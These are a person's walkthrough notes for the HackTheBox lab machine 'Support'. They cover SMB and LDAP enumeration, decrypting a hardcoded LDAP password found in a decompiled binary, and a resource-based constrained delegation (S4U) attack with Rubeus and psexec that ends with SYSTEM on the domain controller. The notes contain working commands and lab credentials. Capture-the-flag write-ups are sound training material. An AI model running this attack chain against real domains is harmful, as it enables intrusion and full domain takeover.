HackTheBox · Lab
Support

Support

EasyWindowsActive Directory

Support.pdf

notes

NMAP

```shell
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-27 10:36:54Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-07-27T10:36:57
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
```

SMB & LDAP reveng

Anon Auth Success but no enum


Guest Auth Success with Shares enum


```shell
support-tools   READ            support staff tools
```


With spidering the share we see an interesting file


```shell
//10.10.11.174/support-tools/UserInfo.exe.zip
```


![Screenshot_2025-07-27_at_3.43.44_PM.png](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/62d2b1ec-1550-41a3-88af-8a9200108e78/Screenshot_2025-07-27_at_3.43.44_PM.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB466Z5GYSQQF%2F20260309%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260309T082852Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEGAaCXVzLXdlc3QtMiJGMEQCIB1ANZ6Hc6b9xKvp0256yFFl61o1RaS8z7l5OsdCSAB0AiADnOZpznXVksG2l%2FjjbgGkVLkrd%2FethOF497Yhrai4KSr%2FAwgpEAAaDDYzNzQyMzE4MzgwNSIMJrOINKGrWnawNcmVKtwD88%2BwvKHDDf%2BT7azWsfKGQL0rHBWR61Ek8V%2FIV%2B46yfXH0F3KNk7clboh15xmSQNIyaekkyiWIueoEs0CHziC6QqhgqMReIzRHF%2FlzoV%2FwjwHaLZJgJPhfrXLttpSdCaEwVMueAQZQx4bdmYA0MfaJnuzVkxTtQUdnhL0K5J5ezo1wHjHPyeCWcBiykIpidO18MVHqTnuu8BJkSh9lpyZBGwRYfQF9za3emBkeZjPgn%2BykIWzc%2BvMG0Hh%2BT1FOZIAFMbAKqJuf6DtT9b2AiVD5edOck2M%2BUSne4JN1J%2FbvqGJ1MUjbTH0r9zlwfm36nP1yc9qBKkQVLYrZt%2Bp0OGjTBLeO2Z%2BPtm8a4MYHVxqYw4BZlrT2%2FO2PFhENxADEMramnNMGfnVeKCMNcbZ%2FbSq%2BlhAtDkhijEELHCGzySGU18pY1U5WX5KS3VpDWwjDq8KoA6boK3NTMapUpQshrsIuIH%2FCnpHypBrLDqujX8z5UT2oKgAtMUfI4f70cnCs%2Bsm3FbT8Eb1f5CRZyKCWvH0jf6913PmBT8bdfUjPMod%2BhUVD4%2B3Utqz56fsMIZ2I7H6jJtQnW%2BkRmSHW0sc%2FcOYy%2F5jAmU2fxFM03eMbGFonedDWa5%2FI1OfYdunN%2FQwkfS5zQY6pgEx3W8zrZ8oxx5wRPlX1neeloQ6omyveeWFiQhOJD%2BcS8Kt4bAitC40I07DGPq9QAb%2FjS3LNE70qqocJePMqlsNvS8mTzOL64nvM%2BWUZoPmkc%2F6I8c0pnmx1dcdQmVoxOmT1b6sjhumglqVAhixl7r2njr%2FcCzVx3aUh0zKclHp4NPYLGsnFkO5lv%2B9wkM6oJ%2BBGEmaGuKTpsVqC%2BSixA23MjBPueA1&X-Amz-Signature=65b787462b5fd0a4ca321f52ff79c9f055ff813584f43e6c5e40b2ed2557fdc1&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)


Let’s examine this executable further


![image.png](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/294ce4cb-36b2-470d-b402-2add533400da/image.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB466Z5GYSQQF%2F20260309%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260309T082852Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEGAaCXVzLXdlc3QtMiJGMEQCIB1ANZ6Hc6b9xKvp0256yFFl61o1RaS8z7l5OsdCSAB0AiADnOZpznXVksG2l%2FjjbgGkVLkrd%2FethOF497Yhrai4KSr%2FAwgpEAAaDDYzNzQyMzE4MzgwNSIMJrOINKGrWnawNcmVKtwD88%2BwvKHDDf%2BT7azWsfKGQL0rHBWR61Ek8V%2FIV%2B46yfXH0F3KNk7clboh15xmSQNIyaekkyiWIueoEs0CHziC6QqhgqMReIzRHF%2FlzoV%2FwjwHaLZJgJPhfrXLttpSdCaEwVMueAQZQx4bdmYA0MfaJnuzVkxTtQUdnhL0K5J5ezo1wHjHPyeCWcBiykIpidO18MVHqTnuu8BJkSh9lpyZBGwRYfQF9za3emBkeZjPgn%2BykIWzc%2BvMG0Hh%2BT1FOZIAFMbAKqJuf6DtT9b2AiVD5edOck2M%2BUSne4JN1J%2FbvqGJ1MUjbTH0r9zlwfm36nP1yc9qBKkQVLYrZt%2Bp0OGjTBLeO2Z%2BPtm8a4MYHVxqYw4BZlrT2%2FO2PFhENxADEMramnNMGfnVeKCMNcbZ%2FbSq%2BlhAtDkhijEELHCGzySGU18pY1U5WX5KS3VpDWwjDq8KoA6boK3NTMapUpQshrsIuIH%2FCnpHypBrLDqujX8z5UT2oKgAtMUfI4f70cnCs%2Bsm3FbT8Eb1f5CRZyKCWvH0jf6913PmBT8bdfUjPMod%2BhUVD4%2B3Utqz56fsMIZ2I7H6jJtQnW%2BkRmSHW0sc%2FcOYy%2F5jAmU2fxFM03eMbGFonedDWa5%2FI1OfYdunN%2FQwkfS5zQY6pgEx3W8zrZ8oxx5wRPlX1neeloQ6omyveeWFiQhOJD%2BcS8Kt4bAitC40I07DGPq9QAb%2FjS3LNE70qqocJePMqlsNvS8mTzOL64nvM%2BWUZoPmkc%2F6I8c0pnmx1dcdQmVoxOmT1b6sjhumglqVAhixl7r2njr%2FcCzVx3aUh0zKclHp4NPYLGsnFkO5lv%2B9wkM6oJ%2BBGEmaGuKTpsVqC%2BSixA23MjBPueA1&X-Amz-Signature=0bd4c23b600f60be7d9438b940d7f8ac183c196c3bc695ff590412d00acb716e&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)


We can see functions like `FindUser` , `GetUser` & `LdapQuery`


![image.png](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/401fc759-81cc-4c8d-ac33-136f7509fc3e/image.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB466Z5GYSQQF%2F20260309%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260309T082852Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEGAaCXVzLXdlc3QtMiJGMEQCIB1ANZ6Hc6b9xKvp0256yFFl61o1RaS8z7l5OsdCSAB0AiADnOZpznXVksG2l%2FjjbgGkVLkrd%2FethOF497Yhrai4KSr%2FAwgpEAAaDDYzNzQyMzE4MzgwNSIMJrOINKGrWnawNcmVKtwD88%2BwvKHDDf%2BT7azWsfKGQL0rHBWR61Ek8V%2FIV%2B46yfXH0F3KNk7clboh15xmSQNIyaekkyiWIueoEs0CHziC6QqhgqMReIzRHF%2FlzoV%2FwjwHaLZJgJPhfrXLttpSdCaEwVMueAQZQx4bdmYA0MfaJnuzVkxTtQUdnhL0K5J5ezo1wHjHPyeCWcBiykIpidO18MVHqTnuu8BJkSh9lpyZBGwRYfQF9za3emBkeZjPgn%2BykIWzc%2BvMG0Hh%2BT1FOZIAFMbAKqJuf6DtT9b2AiVD5edOck2M%2BUSne4JN1J%2FbvqGJ1MUjbTH0r9zlwfm36nP1yc9qBKkQVLYrZt%2Bp0OGjTBLeO2Z%2BPtm8a4MYHVxqYw4BZlrT2%2FO2PFhENxADEMramnNMGfnVeKCMNcbZ%2FbSq%2BlhAtDkhijEELHCGzySGU18pY1U5WX5KS3VpDWwjDq8KoA6boK3NTMapUpQshrsIuIH%2FCnpHypBrLDqujX8z5UT2oKgAtMUfI4f70cnCs%2Bsm3FbT8Eb1f5CRZyKCWvH0jf6913PmBT8bdfUjPMod%2BhUVD4%2B3Utqz56fsMIZ2I7H6jJtQnW%2BkRmSHW0sc%2FcOYy%2F5jAmU2fxFM03eMbGFonedDWa5%2FI1OfYdunN%2FQwkfS5zQY6pgEx3W8zrZ8oxx5wRPlX1neeloQ6omyveeWFiQhOJD%2BcS8Kt4bAitC40I07DGPq9QAb%2FjS3LNE70qqocJePMqlsNvS8mTzOL64nvM%2BWUZoPmkc%2F6I8c0pnmx1dcdQmVoxOmT1b6sjhumglqVAhixl7r2njr%2FcCzVx3aUh0zKclHp4NPYLGsnFkO5lv%2B9wkM6oJ%2BBGEmaGuKTpsVqC%2BSixA23MjBPueA1&X-Amz-Signature=14fd0431f613d6fbb3b466a6c75712b290ac7a6c500951fc8a80fec0d4b0091d&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)


```shell
{
        string password = Protected.getPassword();
        entry = new DirectoryEntry("LDAP://support.htb", "support\\ldap", password);
        entry.AuthenticationType = AuthenticationTypes.Secure;
        ds = new DirectorySearcher(entry);
    }
```


This code indicates that the binary is used to conenct to a remote LDAP server and attempt to fetch user information. We should add support.htb to our hosts file.


The password to auth with LDAP server is fetched from `Protected.getPassword()`


```shell
{
    private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";

    private static byte[] key = Encoding.ASCII.GetBytes("armando");

    public static string getPassword()
    {
        byte[] array = Convert.FromBase64String(enc_password);
        byte[] array2 = array;
        for (int i = 0; i < array.Length; i++)
        {
            array2[i] = (byte)(array[i] ^ key[i % key.Length] ^ 0xDF);
        }
        return Encoding.Default.GetString(array2);
    }
}
```

- The `enc_password` string is Base64 decoded and placed into a byte array.
- A second byte array called `array2` is created with the same value as `array`
- A loop is initialised which loops through each charcater in `array` and XORs it with one letter of the key and then with the byte `0xDF` (223)
- Finally the decrypted key is returned.

Maybe we can script a decryption process in python


```python
import base64

enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
key = b"armando"

def get_password():
    encrypted_bytes = base64.b64decode(enc_password)
    decrypted_bytes = bytearray()

    for i in range(len(encrypted_bytes)):
        decrypted_byte = encrypted_bytes[i] ^ key[i % len(key)] ^ 0xDF
        decrypted_bytes.append(decrypted_byte)

    return decrypted_bytes.decode('latin1') 

print(get_password())
```


We can also use cyberchef for this

- From Base64
- XOR `armando` UTF8 / latin1
- XOR 223 Decimal

```python
❯ py dec.py
nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
```


Now we have the decrypted password and we can connect to LDAP


We can also try enumerate the `UserInfo.exe` in windows.


```shell
PS C:\Users\Administrator\Desktop\UserInfo.exe> .\UserInfo.exe -v find -first "*"
[*] LDAP query to use: (givenName=*)
[+] Found 15 results:
       raven.clifton
       anderson.damian
       monroe.david
       cromwell.gerard
       west.laura
       levine.leopoldo
       langley.lucy
       daughtler.mabel
       bardot.mary
       stoll.rachelle
       thomas.raphael
       smith.rosario
       wilson.shelby
       hernandez.stanley
       ford.victoria
```


We can also use NXC with our new key


```shell
❯ nxc smb $IP -u 'ldap' -p $KEY --users | awk '{print$ 5}' | fgrep -v '[*]'
Administrator
Guest
krbtgt
ldap
support
smith.rosario
hernandez.stanley
wilson.shelby
anderson.damian
thomas.raphael
levine.leopoldo
raven.clifton
bardot.mary
cromwell.gerard
monroe.david
west.laura
langley.lucy
daughtler.mabel
stoll.rachelle
ford.victoria
```

Let’s enumerate LDAP with ldapsearch

```shell
ldapsearch -x -H ldap://$IP -D 'ldap@support.htb' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "DC=support,DC=htb" > ldap.out

❯ cat ldap.out|grep 'info:'
info: Ironside47pleasure40Watchful
```


Looks like we came across a password for the user `support`


```shell
❯ nxc winrm $IP -u $USER -p $PASS
[+] support.htb\support:Ironside47pleasure40Watchful 
(Pwn3d!)
```

Bloodhound

![Screenshot_2025-07-28_at_7.32.00_AM.png](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/cf23f34e-6c92-406b-be68-834eb737c0bf/Screenshot_2025-07-28_at_7.32.00_AM.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB466XWQICJC5%2F20260309%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260309T082854Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEGAaCXVzLXdlc3QtMiJGMEQCIHVCRvFaoOA2eboGluWdofstKyr9umCqgUuXqcc8aALVAiB%2B0THtFjvFUZYRhSPt6pMmetlUv71WRMjiRtZhCSx7YCr%2FAwgpEAAaDDYzNzQyMzE4MzgwNSIM4heDg6xDvD2OyyG5KtwDZSuVa0zMLEO9YnyiMCnIajn%2FTCATF%2BwpqUBzyhdniuHYZlEzXi3yJ0E6yrsBL0WZ5%2FZknD2wDHhr%2BzPEBNnrdLRhpeHzsWgSW14FLLRLg3zoyS1NJ94KrSQQg1XSU7LHrn3mJeqisk9gsckeEfI2R48iT7N6YQnSVx10CZQqZnKJQrnxesxnursgWgJd%2FHhnasGPZFr68EKRyDcEnIZeIIbEz4it4tHpS6JlV5qQ9A6AtX7%2FuOO%2F8wvNptvVS35wjfjUfJqTRTGjXMdUTurYKTgZ1NVstuDdTXgDHhi9Ic0G7YOISX1hlG3H64uJ%2F1gTH1PJzkzV0IZmrwRAr5HLJqCPuueqsmGKJoZuOCJe8iNNYtCvi8yXSWLrXUBmkP2E1SYZiWcFTrwyuzC3LCjBUTHohsiBwaGiEAa%2B0FOzlYt0ZDgLFtiSYkZg19e0ZVsGbhVIfVCUYlzyTgaSh3PbSUg4dYSGVN8XfRMfUbUyRAy6mdAEeobHqPXrAj0g2%2BzlW9et2P1yCVN37PemBRlwG24S%2Bfqkd%2BusoS%2FOpXRSudyDOWjq4dvWbB%2F4b8uWgaQfRwcOFwePAw41j%2B8JW8m41qK2OdrRw9CFDLuSvNUDrBSbmDvEs21GG6NDMFwwkPS5zQY6pgFhfVEKKzJNAj7RYB09idtanZnfcQQ0YddXjo%2BNg7Uy5x%2FcJ1r0LpxckVEcM0KCl4WouC9cBK4FYNUnVfgJ0PLihai52R1Ko3PnS10eXYdqb31v%2F%2FpXChsD26mshrZVLUksu0fqQHlL1PPT9wJkYbh%2FeO%2F4jE5mrWCniRUQTzdYm5ZBqAKXO8Fz5YF%2FN9aDlzP3SX0Y9VCdjqMC0FO3RZvvf%2FLe40nV&X-Amz-Signature=1cacf455de8dc329a8f33c1c5acc807d2770f4369a3d1e8aadf740893a890ba4&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)


We have `GenericAll` on `DC.SUPPORT.HTB`

Lets do a RBCD/S4U attack

We add host


```shell
New-MachineAccount -MachineAccount FAKE-COMP01 -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)
```


Config the RBCD


```shell
Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount FAKE-COMP01$
```


Execute the S4U


```shell
.\Rubeus.exe hash /password:Password123 /user:FAKE-COMP01$ /domain:support.htb
```


Generate our kerberos ticket for `Administrator`


```shell
.\rubeus.exe s4u /user:FAKE-COMP01$ /rc4:58A478135A93AC3BF058A5EA0E8FDB71 /impersonateuser:Administrator /msdsspn:cifs/dc.support.htb /domain:support.htb /ptt
```


Convert and fix the ticket


Grab a shell


```shell
❯ KRB5CCNAME=ticket.ccache psexec.py support.htb/administrator@dc.support.htb -k -no-pass

C:\Windows\system32> whoami
nt authority\system
```

image.png

Scope

OS

Windows Server 2022 Build 20348 x64

FQDN / DOMAIN

DC.support.htb

Users

Administrator
Guest
krbtgt
ldap
support
smith.rosario
hernandez.stanley
wilson.shelby
anderson.damian
thomas.raphael
levine.leopoldo
raven.clifton
bardot.mary
cromwell.gerard
monroe.david
west.laura
langley.lucy
daughtler.mabel
stoll.rachelle
ford.victoria

Credentials

support:Ironside47pleasure40Watchful

NMAP

PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49664/tcp open  unknown
49667/tcp open  unknown
49674/tcp open  unknown
49686/tcp open  unknown
49691/tcp open  unknown
49713/tcp open  unknown

SMB Shares

Web Services Enumeration

Web Technology

[+] Nikto

[+] Wfuzz

Other Notes

Privilege Escalation

Takeaway Concepts

Logs

support_smb_spidering_2025-07-27_12-50-55.log